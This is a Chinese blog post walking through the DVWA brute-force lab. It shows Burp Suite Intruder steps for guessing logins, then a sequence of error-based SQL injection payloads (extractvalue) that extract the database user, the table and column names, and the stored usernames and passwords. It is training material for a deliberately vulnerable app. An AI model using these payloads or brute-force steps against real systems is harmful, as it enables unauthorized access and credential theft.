DVWA - Brute Force (Low)

low级别(使用burpsuite 和 sql报错注入 )

使用burpsuite

打开burp suite,配置好代理,截取数据包在这里插入图片描述

在空白处右键选择send to Intruder ,或者直接ctrl+l 键

在这里插入图片描述
进入Intruder,清除所有原来默认的变量
在这里插入图片描述

只对username和password添加变量

在这里插入图片描述 选择Attack type为Cluster Bomb
在这里插入图片描述
Payload set 为1,表示为第一个参数设置字典为2就是为第二个参数设置字典
在这里插入图片描述
在这里插入图片描述
可以修改线程数提高速度,选择start attack,开始破解
在这里插入图片描述
在这里插入图片描述
admin password 长度与其他不同 ,破解成功
在这里插入图片描述
登录成功

sql注入

1.获取用户
1’ and extractvalue(1,concat(’~’,(select+user()),’~’))# 在这里插入图片描述
在这里插入图片描述

2.获取数据库名
1’ and extractvalue(1,concat(’~’,(select database()),’~’))#
在这里插入图片描述
在这里插入图片描述

3.获取表名
1’ and extractvalue(1,concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=‘dvwa’ limit 0,1),’~’))#

在这里插入图片描述
1’ and extractvalue(1,concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=‘dvwa’ limit 1,1),’~’))#

在这里插入图片描述
1’ and extractvalue(1,concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=‘dvwa’ limit 2,1),’~’))#
在这里插入图片描述
报错证明只有两张表

4.获取列名
1’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 0,1),’~’))#

在这里插入图片描述
1’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 1,1),’~’))#

在这里插入图片描述
修改limit值,查看全部列名 我们只用user,password这两列

5.获取字段值
1’ and extractvalue(1,concat(’~’,(select concat(user)from dvwa.users limit 0,1),’~’))#

在这里插入图片描述
1’ and extractvalue(1,concat(’~’,(select concat(password)from dvwa.users limit 0,1),’~’))#
在这里插入图片描述
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值